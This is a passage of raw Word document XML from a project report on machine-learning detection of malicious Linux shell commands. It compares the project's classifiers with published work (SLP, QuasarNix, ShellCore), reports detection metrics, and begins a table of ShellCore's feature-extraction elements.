        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Transfer / generalization tested</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">SLP: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>not a cross-corpus study</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> (in-distribution). QuasarNix: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>yes</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> — black-box evasion attacks and adversarially robust defenses.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Yes, explicitly</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> — cross-dataset D1↔D2 transfer, leave-one-attack-source-out, and a source-separability confound probe.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="120" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>Comparative essay</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>What Trizna did.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> The through-line of Trizna's command-detection work is that </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>representation and data realism dominate the problem</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. The SLP paper (2021) argues that off-the-shelf NLP pipelines fail on Unix commands — flags, paths, quoting, and substitution break word tokenizers — and shows that a shell-aware tokenizer lifts a supervised classifier on real </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>auditd</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> telemetry from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>F1 0.392 to 0.874</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, a result driven entirely by the encoding rather than a heavier model. QuasarNix (2024) then attacks the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>data</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> side of generalization directly: rather than collect more labels, it </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>synthesizes over a million reverse-shell variants</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> from ~34 threat-intel templates while preserving benign variability, evaluates at an operationally honest </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>FPR of 10⁻⁵</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (reporting ~90% higher detection than non-augmented baselines at that threshold), and hardens the models against black-box evasion. Together they frame LotL detection as a representation-and-robustness problem, not a bigger-classifier problem.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>How our results compare.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> On raw in-distribution quality our best models are in the same neighborhood as SLP's headline: the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>XGBoost-hybrid reaches F1 0.8761 / ROC-AUC 0.978 on Dataset 1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>0.8482 / 0.965 on Dataset 2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, and the TF-IDF+LR </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>baseline</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is close behind (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>0.8808 / 0.980</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>0.8631 / 0.964</w:t>
      </w:r>
      <w:r>
        <w:t>) — all comfortably above SLP's 0.874 F1 ballpark, though on a different, provenance-labeled corpus so the numbers are not directly commensurable. The CNN is a hair behind in-domain (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>F1 0.8603 / 0.8384</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) but, as Ch. 8 shows, transfers best. Crucially, our results echo QuasarNix's central methodological point: headline F1 flatters. At QuasarNix's kind of strict operating point, our </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>TPR@FPR=0.1%</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> for the XGBoost-hybrid is only </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>0.575 (D1)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>0.507 (D2)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — i.e. even the strongest model catches only about half of attacks once false alarms are held to 1-in-1000. The gap between our ~0.97 ROC-AUC and our ~0.55 TPR@0.1%FPR is exactly the discrepancy QuasarNix's low-FPR evaluation was designed to expose.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Baseline configuration note.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> The TF-IDF + LR baseline uses character 3–5 grams with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>min_df=1, max_features=None</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (no vocabulary caps). Removing the earlier caps (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>min_df=2, max_features=40000</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) was tested and does </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>not</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> close the residual ~0.02 gap to the original 0.898 (D1) / 0.882 (D2) references — full-data hold-out F1 lands at ~0.884 (D1) / ~0.856 (D2) either way. That residual is therefore attributable to differences in the original's train/test split handling, not the vectorizer configuration, and no further tuning was applied (to avoid overfitting the test set).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>What our approach adds, and trades off.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Our contribution is orthogonal to Trizna's: we make </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>label provenance and its confounds the object of study</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Where SLP assumes trustworthy supervised labels and QuasarNix manufactures clean synthetic ones, we take </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>provenance-based</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> labels (a command is malicious because of where it was collected) and stress-test what that buys and costs — via a source-separability probe (a classifier recovers which of 11 corpora a line came from at </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>0.821 accuracy vs. 0.298 chance</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), leave-one-source-out recall, and an </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>explicit cross-dataset transfer</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> evaluation that neither SLP nor the assigned framing performs on Linux commands. That evaluation surfaces the finding that dominates our project: in-domain scores are inflated by corpus style. The trade-offs are real — we do </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>not</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> perform synthetic augmentation or adversarial hardening (QuasarNix's strengths), our provenance labels are noisier per-line than SLP's supervised </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>auditd</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> labels, and our data is curated/honeypot rather than a single organization's production telemetry, so our absolute numbers should be read as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>relative</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> diagnostics.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>On the anomaly-detection framing.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Our closest analog to an unsupervised sequence model is the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>IsolationForest</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> stage, trained on benign-only data. Its weak standalone result — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>F1 0.249 (D1), 0.143 (D2)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — is consistent with the literature: for a task where malicious and benign commands overlap heavily in content (Ch. 8's dual-use false positives), pure anomaly detection under-performs supervised discrimination, which is why our cascade uses it only as a cheap first-stage bulk filter rather than the primary classifier.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>References.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Trizna, D. (2021), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Shell Language Processing: Unix command parsing for Machine Learning</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, arXiv:2107.02438 (CAMLIS 2021). Trizna, D., Demetrio, L., Biggio, B., &amp; Roli, F. (2026), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Robust Large-Scale Detection of Living-Off-the-Land Reverse Shells via Data Synthesis</w:t>
      </w:r>
      <w:r>
        <w:t>, ACM Transactions on Privacy and Security (TOPS), DOI: 10.1145/3807450, arXiv:2402.18329.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="200" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>Chapter 2.1 — Feature Extraction in ShellCore</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Paper: H. Alasmary, A. Anwar, A. Abusnaina, A. Alabduljabbar, H. Abuhamad,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>A. Wang, D. Nyang, A. Awad and D. Mohaisen, *ShellCore: Automating Malicious</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>IoT Software Detection Using Shell Commands Representation*, IEEE Internet of</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Things Journal 9(4), 2022 (arXiv:2103.14221). Every figure quoted below was</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>read first-hand from the authors' Tables 1–5 and Sections 4.1–4.5 and 5.5;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>the local copy (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>docs/refs/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>) is deliberately untracked for licensing reasons.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Section 2.2 gives the adopt/modify/reject decision for each element.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>ShellCore is the closest published antecedent to this project: it is the only</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">work we found that treats the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>shell command string itself</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> as the unit of</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>detection for Linux/IoT malware, which is exactly the premise argued in</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>Section 1.1. It therefore serves both as the source of our representational</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>insight and as the benchmark in Chapter 8.3. This section extracts what it</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>actually does; Section 2.2 argues about it.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="120" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>The extraction pipeline, element by element</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>The authors build two parallel representations of the same command corpus and</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>run the same three classifiers on each.</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7"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>#</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Element</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>§</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Mechanism</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Security meaning claimed by the authors</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Term-level model</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>3.1.1, 3.3.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Bag-of-words; spaces and special characters act as tokenizers; </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>words shorter than three characters are discarded</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>; 1- to 5-grams</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>The "locality of the words" — which command words co-occur</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Character-level model</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>3.1.2, 3.3.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Tokenizers redeclared so that no character is ignored; every letter, digit and symbol becomes an individual feature; same bag and n-gram machinery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Recovers the operators (`\</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>\</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>&amp;&amp;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>) and short keywords (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>cd</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>ls`) that element 1 throws away</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Frequency encoding</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>3.1.4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
